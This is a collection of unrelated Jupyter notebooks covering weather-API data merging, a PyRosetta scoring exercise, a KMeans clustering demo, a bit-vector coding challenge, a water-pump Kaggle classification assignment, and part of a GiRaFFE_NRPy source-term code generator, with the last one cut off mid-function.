# Get wind-speed at 5-min intervals on a specific date
# Note: if 'date' is used instead of 'date_time', the API appears to timeout
wind_speed_df = pd.DataFrame(columns=['station_id', 'wind-speed', 'timestamp (SGT)'])
for dt in pd.date_range('2017-05-24', periods=(24*12+1), freq='5min'):
r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',
headers={'api-key': my_key},
params={'date_time': dt.strftime('%Y-%m-%dT%H:%M:%S')})
temp_df = pd.DataFrame(r.json()['items'][0]['readings'])
temp_df = temp_df.rename(columns={'value': 'wind-speed'})
temp_df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
wind_speed_df = wind_speed_df.append(temp_df, ignore_index=True)
wind_speed_df.head(15)
wind_speed_df.info()
wind_speed_df.groupby('station_id').describe()
```
## Rainfall
```
# Get rainfall at 5-min intervals on a specific date
rainfall_df = pd.DataFrame(columns=['station_id', 'rainfall', 'timestamp (SGT)'])
for dt in pd.date_range('2017-05-24', periods=(24*12+1), freq='5min'): # I remember this was a wet day
r = requests.get('https://api.data.gov.sg/v1/environment/rainfall',
headers={'api-key': my_key},
params={'date_time': dt.strftime('%Y-%m-%dT%H:%M:%S')})
temp_df = pd.DataFrame(r.json()['items'][0]['readings'])
temp_df = temp_df.rename(columns={'value': 'rainfall'})
temp_df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
rainfall_df = rainfall_df.append(temp_df, ignore_index=True)
rainfall_df.head(15)
rainfall_df.info()
rainfall_df['rainfall'] = rainfall_df['rainfall'].astype('float') # convert to float
rainfall_df.info()
```
## Merge wind-speed and rainfall DataFrames
```
# Union of wind-speed and rainfall data
outer_df = pd.merge(wind_speed_df, rainfall_df, how='outer', on=['station_id', 'timestamp (SGT)'])
outer_df.head(15)
outer_df.info()
# Intersection of wind-speed and rainfall data
inner_df = pd.merge(wind_speed_df, rainfall_df, how='inner', on=['station_id', 'timestamp (SGT)'])
inner_df.head(15)
inner_df.info()
inner_df.groupby('station_id').describe()
# Quick look at relationship between rainfall and wind-speed for one station and one day
# Information about station S50
r = requests.get('https://api.data.gov.sg/v1/environment/rainfall',
headers={'api-key': my_key},
params={'date_time': '2017-05-04T00:00:00'})
for d in r.json()['metadata']['stations']:
if d['device_id'] == 'S50':
print(d)
# Select data for station S50
s50_df = inner_df.loc[inner_df['station_id'] == 'S50']
# Plot
sns.jointplot(s50_df['rainfall'], s50_df['wind-speed'], kind='scatter')
```
|
github_jupyter
|
Before you turn this problem in, make sure everything runs as expected. First, **restart the kernel** (in the menubar, select Kernel$\rightarrow$Restart) and then **run all cells** (in the menubar, select Cell$\rightarrow$Run All).
Make sure you fill in any place that says `YOUR CODE HERE` or "YOUR ANSWER HERE", as well as your name and collaborators below:
```
NAME = ""
COLLABORATORS = ""
```
---
<!--NOTEBOOK_HEADER-->
*This notebook contains material from [PyRosetta](https://RosettaCommons.github.io/PyRosetta.notebooks);
content is available [on Github](https://github.com/RosettaCommons/PyRosetta.notebooks.git).*
<!--NAVIGATION-->
< [Practice: Analyzing energy between residues](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.02-Analyzing-energy-between-residues.ipynb) | [Contents](toc.ipynb) | [Index](index.ipynb) | [Introduction to Folding](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/04.00-Introduction-to-Folding.ipynb) ><p><a href="https://colab.research.google.com/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.03-Energies-and-the-PyMOLMover.ipynb"><img align="left" src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab" title="Open in Google Colaboratory"></a>
# Energies and the PyMOL Mover
Keywords: send_energy(), label_energy(), send_hbonds()
```
# Notebook setup
import sys
if 'google.colab' in sys.modules:
!pip install pyrosettacolabsetup
import pyrosettacolabsetup
pyrosettacolabsetup.setup()
print ("Notebook is set for PyRosetta use in Colab. Have fun!")
from pyrosetta import *
from pyrosetta.teaching import *
init()
```
**Make sure you are in the directory with the pdb files:**
`cd google_drive/My\ Drive/student-notebooks/`
```
# From previous section:
ras = pyrosetta.pose_from_pdb("inputs/6Q21_A.pdb")
sfxn = get_fa_scorefxn()
```
The `PyMOLMover` class contains a method for sending score function information to PyMOL,
which will then color the structure based on relative residue energies.
Open up PyMOL. Instantiate a `PyMOLMover` object and use the `pymol_mover.send_energy(ras)` to send the coloring command to PyMOL.
```
pymol_mover = PyMOLMover()
pymol_mover.apply(ras)
print(sfxn(ras))
pymol_mover.send_energy(ras)
```
```
# YOUR CODE HERE
raise NotImplementedError()
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
from IPython import display
from pathlib import Path
gifPath = Path("./Media/PyMOL-send_energy.gif")
# Display GIF in Jupyter, CoLab, IPython
with open(gifPath,'rb') as f:
display.Image(data=f.read(), format='png',width='800')
```
What color is residue Proline34? What color is residue Alanine66? Which residue has lower energy?
```
# your response here
```
`pymol_mover.send_energy(ras, fa_atr)` will have PyMOL color only by the attractive van der Waals energy component. What color is residue 34 if colored by solvation energy, `fa_sol`?
```
# send specific energies to pymol
# YOUR CODE HERE
raise NotImplementedError()
```
You can have PyMOL label each Cα with the value of its residue’s specified energy using:
```
pymol_mover.label_energy(ras, "fa_atr")
```
```
# YOUR CODE HERE
raise NotImplementedError()
```
Finally, if you have scored the `pose` first, you can have PyMOL display all of the calculated hydrogen bonds for the structure:
```
pymol_mover.send_hbonds(ras)
```
```
# YOUR CODE HERE
raise NotImplementedError()
```
## References
This Jupyter notebook is an adapted version of "Workshop #3: Scoring" in the PyRosetta workbook: https://graylab.jhu.edu/pyrosetta/downloads/documentation/pyrosetta4_online_format/PyRosetta4_Workshop3_Scoring.pdf
<!--NAVIGATION-->
< [Practice: Analyzing energy between residues](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.02-Analyzing-energy-between-residues.ipynb) | [Contents](toc.ipynb) | [Index](index.ipynb) | [Introduction to Folding](http://nbviewer.jupyter.org/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/04.00-Introduction-to-Folding.ipynb) ><p><a href="https://colab.research.google.com/github/RosettaCommons/PyRosetta.notebooks/blob/master/notebooks/03.03-Energies-and-the-PyMOLMover.ipynb"><img align="left" src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open in Colab" title="Open in Google Colaboratory"></a>
|
github_jupyter
|
This model will cluster a set of data, first with KMeans and then with MiniBatchKMeans, and plot the results. It will also plot the points that are labelled differently between the two algorithms.
```
import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import MiniBatchKMeans, KMeans
from sklearn.metrics.pairwise import pairwise_distances_argmin
from sklearn.datasets import make_blobs
# Generate sample data
np.random.seed(0)
batch_size = 45
centers = [[1, 1], [-1, -1], [1, -1]]
n_clusters = len(centers)
X, labels_true = make_blobs(n_samples=3000, centers=centers, cluster_std=0.7)
# Compute clustering with Means
k_means = KMeans(init="k-means++", n_clusters=3, n_init=10)
t0 = time.time()
k_means.fit(X)
t_batch = time.time() - t0
# Compute clustering with MiniBatchKMeans
mbk = MiniBatchKMeans(
init="k-means++",
n_clusters=3,
batch_size=batch_size,
n_init=10,
max_no_improvement=10,
verbose=0,
)
t0 = time.time()
mbk.fit(X)
t_mini_batch = time.time() - t0
# Plot result
fig = plt.figure(figsize=(8, 3))
fig.subplots_adjust(left=0.02, right=0.98, bottom=0.05, top=0.9)
colors = ["#4EACC5", "#FF9C34", "#4E9A06"]
# We want to have the same colors for the same cluster from the
# MiniBatchKMeans and the KMeans algorithm. Let's pair the cluster centers per
# closest one.
k_means_cluster_centers = k_means.cluster_centers_
order = pairwise_distances_argmin(k_means.cluster_centers_, mbk.cluster_centers_)
mbk_means_cluster_centers = mbk.cluster_centers_[order]
k_means_labels = pairwise_distances_argmin(X, k_means_cluster_centers)
mbk_means_labels = pairwise_distances_argmin(X, mbk_means_cluster_centers)
# KMeans
ax = fig.add_subplot(1, 3, 1)
for k, col in zip(range(n_clusters), colors):
my_members = k_means_labels == k
cluster_center = k_means_cluster_centers[k]
ax.plot(X[my_members, 0], X[my_members, 1], "w", markerfacecolor=col, marker=".")
ax.plot(
cluster_center[0],
cluster_center[1],
"o",
markerfacecolor=col,
markeredgecolor="k",
markersize=6,
)
ax.set_title("KMeans")
ax.set_xticks(())
ax.set_yticks(())
plt.text(-3.5, 1.8, "train time: %.2fs\ninertia: %f" % (t_batch, k_means.inertia_))
# MiniBatchKMeans
ax = fig.add_subplot(1, 3, 2)
for k, col in zip(range(n_clusters), colors):
my_members = mbk_means_labels == k
cluster_center = mbk_means_cluster_centers[k]
ax.plot(X[my_members, 0], X[my_members, 1], "w", markerfacecolor=col, marker=".")
ax.plot(
cluster_center[0],
cluster_center[1],
"o",
markerfacecolor=col,
markeredgecolor="k",
markersize=6,
)
ax.set_title("MiniBatchKMeans")
ax.set_xticks(())
ax.set_yticks(())
plt.text(-3.5, 1.8, "train time: %.2fs\ninertia: %f" % (t_mini_batch, mbk.inertia_))
# Initialise the different array to all False
different = mbk_means_labels == 4
ax = fig.add_subplot(1, 3, 3)
for k in range(n_clusters):
different += (k_means_labels == k) != (mbk_means_labels == k)
identic = np.logical_not(different)
ax.plot(X[identic, 0], X[identic, 1], "w", markerfacecolor="#bbbbbb", marker=".")
ax.plot(X[different, 0], X[different, 1], "w", markerfacecolor="m", marker=".")
ax.set_title("Difference")
ax.set_xticks(())
ax.set_yticks(())
plt.show()
```
|
github_jupyter
|
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).
# Solution Notebook
## Problem: Given an array of n integers, find an int not in the input. Use a minimal amount of memory.
* [Constraints](#Constraints)
* [Test Cases](#Test-Cases)
* [Algorithm](#Algorithm)
* [Code](#Code)
* [Unit Test](#Unit-Test)
## Constraints
* Are we working with non-negative ints?
* Yes
* What is the range of the integers?
* Discuss the approach for 4 billion integers
* Implement for 32 integers
* Can we assume the inputs are valid?
* No
## Test Cases
* None -> Exception
* [] -> Exception
* General case
* There is an int excluded from the input -> int
* There isn't an int excluded from the input -> None
## Algorithm
The problem states to use a minimal amount of memory. We'll use a bit vector to keep track of the inputs.
Say we are given 4 billion integers, which is 2^32 integers. The number of non-negative integers would be 2^31. With a bit vector, we'll need 4 billion bits to map each integer to a bit. Say we had only 1 GB of memory or 2^32 bytes. This would leave us with 8 billion bits.
To simplify this exercise, we'll work with an input of up to 32 ints that we'll map to a bit vector of 32 bits.
<pre>
input = [0, 1, 2, 3, 4...28, 29, 31]
bytes [ 1 ] [ 2 ] [ 3 ] [ 4 ]
index = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
bit_vector = 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1
result = 30
* Loop through each item in the input, setting bit_vector[item] = True.
* Loop through the bit_vector, return the first index where bit_vector[item] == False.
</pre>
Complexity:
* Time: O(b), where b is the number of bits
* Space: O(b)
## Code
```
from bitstring import BitArray # Run pip install bitstring
class Bits(object):
def new_int(self, array, max_size):
if not array:
raise TypeError('array cannot be None or empty')
bit_vector = BitArray(max_size)
for item in array:
bit_vector[item] = True
for index, item in enumerate(bit_vector):
if not item:
return index
return None
```
## Unit Test
```
# %%writefile test_new_int.py
from nose.tools import assert_equal, assert_raises
class TestBits(object):
def test_new_int(self):
bits = Bits()
max_size = 32
assert_raises(TypeError, bits.new_int, None, max_size)
assert_raises(TypeError, bits.new_int, [], max_size)
data = [item for item in range(30)]
data.append(31)
assert_equal(bits.new_int(data, max_size), 30)
data = [item for item in range(32)]
assert_equal(bits.new_int(data, max_size), None)
print('Success: test_find_int_excluded_from_input')
def main():
test = TestBits()
test.test_new_int()
if __name__ == '__main__':
main()
%run -i test_new_int.py
```
|
github_jupyter
|
Lambda School Data Science
*Unit 2, Sprint 2, Module 4*
---
# Classification Metrics
## Assignment
- [ ] If you haven't yet, [review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
- [ ] Plot a confusion matrix for your Tanzania Waterpumps model.
- [ ] Continue to participate in our Kaggle challenge. Every student should have made at least one submission that scores at least 70% accuracy (well above the majority class baseline).
- [ ] Submit your final predictions to our Kaggle competition. Optionally, go to **My Submissions**, and _"you may select up to 1 submission to be used to count towards your final leaderboard score."_
- [ ] Commit your notebook to your fork of the GitHub repo.
- [ ] Read [Maximizing Scarce Maintenance Resources with Data: Applying predictive modeling, precision at k, and clustering to optimize impact](https://towardsdatascience.com/maximizing-scarce-maintenance-resources-with-data-8f3491133050), by Lambda DS3 student Michael Brady. His blog post extends the Tanzania Waterpumps scenario, far beyond what's in the lecture notebook.
## Stretch Goals
### Reading
- [Attacking discrimination with smarter machine learning](https://research.google.com/bigpicture/attacking-discrimination-in-ml/), by Google Research, with interactive visualizations. _"A threshold classifier essentially makes a yes/no decision, putting things in one category or another. We look at how these classifiers work, ways they can potentially be unfair, and how you might turn an unfair classifier into a fairer one. As an illustrative example, we focus on loan granting scenarios where a bank may grant or deny a loan based on a single, automatically computed number such as a credit score."_
- [Notebook about how to calculate expected value from a confusion matrix by treating it as a cost-benefit matrix](https://github.com/podopie/DAT18NYC/blob/master/classes/13-expected_value_cost_benefit_analysis.ipynb)
- [Visualizing Machine Learning Thresholds to Make Better Business Decisions](https://blog.insightdatascience.com/visualizing-machine-learning-thresholds-to-make-better-business-decisions-4ab07f823415)
### Doing
- [ ] Share visualizations in our Slack channel!
- [ ] RandomizedSearchCV / GridSearchCV, for model selection. (See module 3 assignment notebook)
- [ ] Stacking Ensemble. (See module 3 assignment notebook)
- [ ] More Categorical Encoding. (See module 2 assignment notebook)
```
%%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
!pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
import pandas as pd
import geopandas as gpd
import numpy as np
import matplotlib.pyplot as plt
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
train_wards = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/train_wards.csv")
test_wards = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/test_wards.csv")
train_elev = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/train_srtm_elevation.csv")
test_elev = pd.read_csv("/home/alex/data/tanzania-pumps-rasterstats/test_srtm_elevation.csv")
train_merged = train.merge(train_wards, on="id").merge(train_elev, on="id")
test_merged = test.merge(test_wards, on="id").merge(test_elev, on="id")
train_merged.columns
def clean_columns(df):
dataframe = df.copy()
dataframe.rename(columns={"longitude_x":"longitude","latitude_x":"latitude"}, inplace=True)
dataframe.drop(["Unnamed: 0_x","Unnamed: 0_y","latitude_y","longitude_y","gps_height"], axis=1, inplace=True)
return dataframe
train_clean = clean_columns(train_merged)
test_clean = clean_columns(test_merged)
from sklearn.model_selection import train_test_split
train_clean, validate_clean = train_test_split(
train_clean,
train_size=0.80,
test_size=0.20,
stratify=train['status_group'],
random_state=42)
def wrangle(X):
"""Wrangle train, validate, and test sets in the same way"""
# Prevent SettingWithCopyWarning
X = X.copy()
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these values like zero.
X['latitude'] = X['latitude'].replace(-2e-08, 0)
# When columns have zeros and shouldn't, they are like null values.
# So we will replace the zeros with nulls, and impute missing values later.
# Also create a "missing indicator" column, because the fact that
# values are missing may be a predictive signal.
cols_with_zeros = ['longitude', 'latitude', 'construction_year',
'gps_height', 'population']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
X[col+'_MISSING'] = X[col].isnull()
# Drop duplicate columns
duplicates = ['quantity_group', 'payment_type']
X = X.drop(columns=duplicates)
# Drop recorded_by (never varies) and id (always varies, random)
unusable_variance = ['recorded_by', 'id']
X = X.drop(columns=unusable_variance)
# Convert date_recorded to datetime
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
X['years_MISSING'] = X['years'].isnull()
# return the wrangled dataframe
return X
# The status_group column is the target
target = 'status_group'
# Get a dataframe with all train columns except the target
train_features = train_clean.drop(columns=[target])
# Get a list of the numeric features
numeric_features = train_features.select_dtypes(include='number').columns.tolist()
# Get a series with the cardinality of the nonnumeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
# Get a list of all categorical features
categorical_features = cardinality.index.tolist()
# Combine the lists
features = numeric_features + categorical_features
def reduce_cardinality_to_top_ten(feature, train, validate, test):
# Get a list of the top 10 entries in feature of interest
top10 = train[feature].value_counts()[:10].index
train = train.copy()
validate = validate.copy()
test = test.copy()
# At locations where the feature entry is NOT in the top 10,
# replace the entry with 'OTHER'
train.loc[~train[feature].isin(top10), feature] = 'OTHER'
validate.loc[~validate[feature].isin(top10), feature] = 'OTHER'
test.loc[~test[feature].isin(top10), feature] = 'OTHER'
return train, validate, test
categorical_features_with_more_than_ten_categories = []
for feature in categorical_features:
if len(train_clean[feature].unique()) > 10:
categorical_features_with_more_than_ten_categories.append(feature)
categorical_features_with_more_than_ten_categories
for feature in categorical_features_with_more_than_ten_categories:
train_clean, validate_clean, test_clean = reduce_cardinality_to_top_ten(feature, train_clean, validate_clean, test_clean)
X_train = train_clean[features]
X_validate = validate_clean[features]
X_test = test_clean[features]
y_train = train_clean[target]
y_validate = validate_clean[target]
import category_encoders as ce
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=8, max_depth=32, max_features= 0.668819157886731, min_samples_leaf=2, n_estimators=370, n_jobs=-1))
pipeline.fit(X_train, y_train)
print(pipeline.score(X_train, y_train))
print(pipeline.score(X_validate, y_validate))
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370))
pipeline.fit(X_train, y_train)
print(pipeline.score(X_train, y_train))
print(pipeline.score(X_validate, y_validate))
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=8, min_samples_leaf=2, n_jobs=-1, n_estimators=370, max_depth=32)
)
pipeline.fit(X_train, y_train)
print(pipeline.score(X_train, y_train))
print(pipeline.score(X_validate, y_validate))
y_pred = pipeline.predict(X_test)
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission
submission.to_csv('/home/alex/code/DS-Unit-2-Kaggle-Challenge/module4-classification-metrics/alex-pakalniskis-kaggle-submission-day-4.1.csv', index=False)
from sklearn.metrics import plot_confusion_matrix
plot_confusion_matrix(pipeline, X_validate, y_validate, values_format='.0f', xticks_rotation="vertical")
plt.show()
from sklearn.metrics import classification_report
y_pred = pipeline.predict(X_validate)
print(classification_report(y_validate, y_pred))
```
|
github_jupyter
|
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-59152712-8');
</script>
# `GiRaFFE_NRPy`: Source Terms
## Author: Patrick Nelson
<a id='intro'></a>
**Notebook Status:** <font color=green><b> Validated </b></font>
**Validation Notes:** This code produces the expected results for generated functions.
## This module presents the functionality of [GiRaFFE_NRPy_Source_Terms.py](../../edit/in_progress/GiRaFFE_NRPy/GiRaFFE_NRPy_Source_Terms.py).
## Introduction:
This writes and documents the C code that `GiRaFFE_NRPy` uses to compute the source terms for the right-hand sides of the evolution equations for the unstaggered prescription.
The equations themselves are already coded up in other functions; however, for the $\tilde{S}_i$ source term, we will need derivatives of the metric. It will be most efficient and accurate to take them using the interpolated metric values that we will have calculated anyway; however, we will need to write our derivatives in a nonstandard way within NRPy+ in order to take advantage of this, writing our own code for memory access.
<a id='toc'></a>
# Table of Contents
$$\label{toc}$$
This notebook is organized as follows
1. [Step 1](#stilde_source): The $\tilde{S}_i$ source term
1. [Step 2](#code_validation): Code Validation against original C code
1. [Step 3](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file
```
# Step 0: Add NRPy's directory to the path
# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory
import os,sys
nrpy_dir_path = os.path.join("..")
if nrpy_dir_path not in sys.path:
sys.path.append(nrpy_dir_path)
import cmdline_helper as cmd
outdir = os.path.join("GiRaFFE_NRPy","GiRaFFE_Ccode_validation","RHSs")
cmd.mkdir(outdir)
```
<a id='stilde_source'></a>
## Step 1: The $\tilde{S}_i$ source term \[Back to [top](#toc)\]
$$\label{stilde_source}$$
We start in the usual way - import the modules we need. We will also import the Levi-Civita symbol from `indexedexp.py` and use it to set the Levi-Civita tensor $\epsilon^{ijk} = [ijk]/\sqrt{\gamma}$.
```
# Step 1: The StildeD RHS *source* term
from outputC import outputC, outCfunction # NRPy+: Core C code output module
import indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support
import GRHD.equations as GRHD # NRPy+: Generate general relativistic hydrodynamics equations
import GRFFE.equations as GRFFE # NRPy+: Generate general relativistic force-free electrodynamics equations
thismodule = "GiRaFFE_NRPy_Source_Terms"
def generate_memory_access_code(gammaDD,betaU,alpha):
# There are several pieces of C code that we will write ourselves because we need to do things
# a little bit outside of what NRPy+ is built for.
# First, we will write general memory access. We will read in values from memory at a given point
# for each quantity we care about.
global general_access
general_access = ""
for var in ["GAMMADD00", "GAMMADD01", "GAMMADD02",
"GAMMADD11", "GAMMADD12", "GAMMADD22",
"BETAU0", "BETAU1", "BETAU2","ALPHA",
"BU0","BU1","BU2",
"VALENCIAVU0","VALENCIAVU1","VALENCIAVU2"]:
lhsvar = var.lower().replace("dd","DD").replace("u","U").replace("bU","BU").replace("valencia","Valencia")
# e.g.,
# const REAL gammaDD00dD0 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];
general_access += "const REAL "+lhsvar+" = auxevol_gfs[IDX4S("+var+"GF,i0,i1,i2)];\n"
# This quick function returns a nearby point for memory access. We need this because derivatives are not local operations.
def idxp1(dirn):
if dirn==0:
return "i0+1,i1,i2"
if dirn==1:
return "i0,i1+1,i2"
if dirn==2:
return "i0,i1,i2+1"
# Next we evaluate needed derivatives of the metric, based on their values at cell faces
global metric_deriv_access
metric_deriv_access = []
# for dirn in range(3):
# metric_deriv_access.append("")
# for var in ["GAMMA_FACEDDdD00", "GAMMA_FACEDDdD01", "GAMMA_FACEDDdD02",
# "GAMMA_FACEDDdD11", "GAMMA_FACEDDdD12", "GAMMA_FACEDDdD22",
# "BETA_FACEUdD0", "BETA_FACEUdD1", "BETA_FACEUdD2","ALPHA_FACEdD"]:
# lhsvar = var.lower().replace("dddd","DDdD").replace("udd","UdD").replace("dd","dD").replace("u","U").replace("_face","")
# rhsvar = var.replace("dD","")
# # e.g.,
# # const REAL gammaDDdD000 = (auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)]-auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)])/dxx0;
# metric_deriv_access[dirn] += "const REAL "+lhsvar+str(dirn)+" = (auxevol_gfs[IDX4S("+rhsvar+"GF,"+idxp1(dirn)+")]-auxevol_gfs[IDX4S("+rhsvar+"GF,i0,i1,i2)])/dxx"+str(dirn)+";\n"
# metric_deriv_access[dirn] += "REAL Stilde_rhsD"+str(dirn)+";\n"
# For this workaround, instead of taking the derivative of the metric components and then building the
# four-metric, we build the four-metric and then take derivatives. Do this at i and i+1
for dirn in range(3):
metric_deriv_access.append("")
for var in ["GAMMA_FACEDD00", "GAMMA_FACEDD01", "GAMMA_FACEDD02",
"GAMMA_FACEDD11", "GAMMA_FACEDD12", "GAMMA_FACEDD22",
"BETA_FACEU0", "BETA_FACEU1", "BETA_FACEU2","ALPHA_FACE"]:
lhsvar = var.lower().replace("dd","DD").replace("u","U")
rhsvar = var
# e.g.,
# const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0,i1,i2)];
metric_deriv_access[dirn] += "const REAL "+lhsvar+" = auxevol_gfs[IDX4S("+rhsvar+"GF,i0,i1,i2)];\n"
# Read in at the next grid point
for var in ["GAMMA_FACEDD00", "GAMMA_FACEDD01", "GAMMA_FACEDD02",
"GAMMA_FACEDD11", "GAMMA_FACEDD12", "GAMMA_FACEDD22",
"BETA_FACEU0", "BETA_FACEU1", "BETA_FACEU2","ALPHA_FACE"]:
lhsvar = var.lower().replace("dd","DD").replace("u","U").replace("_face","_facep1")
rhsvar = var
# e.g.,
# const REAL gammaDD00 = auxevol_gfs[IDX4S(GAMMA_FACEDD00GF,i0+1,i1,i2)];
metric_deriv_access[dirn] += "const REAL "+lhsvar+" = auxevol_gfs[IDX4S("+rhsvar+"GF,"+idxp1(dirn)+")];\n"
metric_deriv_access[dirn] += "REAL Stilde_rhsD"+str(dirn)+";\n"
import BSSN.ADMBSSN_tofrom_4metric as AB4m
AB4m.g4DD_ito_BSSN_or_ADM("ADM",gammaDD,betaU,alpha)
four_metric_vars = [
AB4m.g4DD[0][0],
AB4m.g4DD[0][1],
AB4m.g4DD[0][2],
AB4m.g4DD[0][3],
AB4m.g4DD[1][1],
AB4m.g4DD[1][2],
AB4m.g4DD[1][3],
AB4m.g4DD[2][2],
AB4m.g4DD[2][3],
AB4m.g4DD[3][3]
]
four_metric_names = [
"g4DD00",
"g4DD01",
"g4DD02",
"g4DD03",
"g4DD11",
"g4DD12",
"g4DD13",
"g4DD22",
"g4DD23",
"g4DD33"
]
global four_metric_C, four_metric_Cp1
four_metric_C = outputC(four_metric_vars,four_metric_names,"returnstring",params="outCverbose=False,CSE_sorting=none")
for ii in range(len(four_metric_names)):
four_metric_names[ii] += "p1"
four_metric_Cp1 = outputC(four_metric_vars,four_metric_names,"returnstring",params="outCverbose=False,CSE_sorting=none")
four_metric_C = four_metric_C.replace("gamma","gamma_face").replace("beta","beta_face").replace("alpha","alpha_face").replace("{","").replace("}","").replace("g4","const REAL g4").replace("tmp_","tmp_deriv")
four_metric_Cp1 = four_metric_Cp1.replace("gamma","gamma_facep1").replace("beta","beta_facep1").replace("alpha","alpha_facep1").replace("{","").replace("}","").replace("g4","const REAL g4").replace("tmp_","tmp_derivp")
global four_metric_deriv
four_metric_deriv = []
for dirn in range(3):
four_metric_deriv.append("")
for var in ["g4DDdD00", "g4DDdD01", "g4DDdD02", "g4DDdD03", "g4DDdD11",
"g4DDdD12", "g4DDdD13", "g4DDdD22", "g4DDdD23", "g4DDdD33"]:
lhsvar = var + str(dirn+1)
rhsvar = var.replace("dD","")
rhsvarp1 = rhsvar + "p1"
# e.g.,
# const REAL g44DDdD000 = (g4DD00p1 - g4DD00)/dxx0;
four_metric_deriv[dirn] += "const REAL "+lhsvar+" = ("+rhsvarp1+" - "+rhsvar+")/dxx"+str(dirn)+";\n"
# This creates the C code that writes to the Stilde_rhs direction specified.
global write_final_quantity
write_final_quantity = []
for dirn in range(3):
write_final_quantity.append("")
write_final_quantity[dirn] += "rhs_gfs[IDX4S(STILDED"+str(dirn)+"GF,i0,i1,i2)] += Stilde_rhsD"+str(dirn)+";"
def write_out_functions_for_StildeD_source_term(outdir,outCparams,gammaDD,betaU,alpha,ValenciavU,BU,sqrt4pi):
generate_memory_access_code(gammaDD,betaU,alpha)
# First, we declare some dummy tensors that we will use for the codegen.
gammaDDdD = ixp.declarerank3("gammaDDdD","sym01",DIM=3)
betaUdD = ixp.declarerank2("betaUdD","nosym",DIM=3)
alphadD = ixp.declarerank1("alphadD",DIM=3)
g4DDdD = ixp.declarerank3("g4DDdD","sym01",DIM=4)
# We need to rerun a few of these functions with the reset lists to make sure these functions
# don't cheat by using analytic expressions
GRHD.compute_sqrtgammaDET(gammaDD)
GRHD.u4U_in_terms_of_ValenciavU__rescale_ValenciavU_by_applying_speed_limit(alpha, betaU, gammaDD, ValenciavU)
GRFFE.compute_smallb4U(gammaDD, betaU, alpha, GRHD.u4U_ito_ValenciavU, BU, sqrt4pi)
GRFFE.compute_smallbsquared(gammaDD, betaU, alpha, GRFFE.smallb4U)
GRFFE.compute_TEM4UU(gammaDD,betaU,alpha, GRFFE.smallb4U, GRFFE.smallbsquared,GRHD.u4U_ito_ValenciavU)
# GRHD.compute_g4DD_zerotimederiv_dD(gammaDD,betaU,alpha, gammaDDdD,betaUdD,alphadD)
GRHD.compute_S_tilde_source_termD(alpha, GRHD.sqrtgammaDET,g4DDdD, GRFFE.TEM4UU)
for i in range(3):
desc = "Adds the source term to StildeD"+str(i)+"."
name = "calculate_StildeD"+str(i)+"_source_term"
outCfunction(
outfile = os.path.join(outdir,name+".h"), desc=desc, name=name,
params ="const paramstruct *params,const REAL *auxevol_gfs, REAL *rhs_gfs",
body = general_access \
+metric_deriv_access[i]\
+four_metric_C\
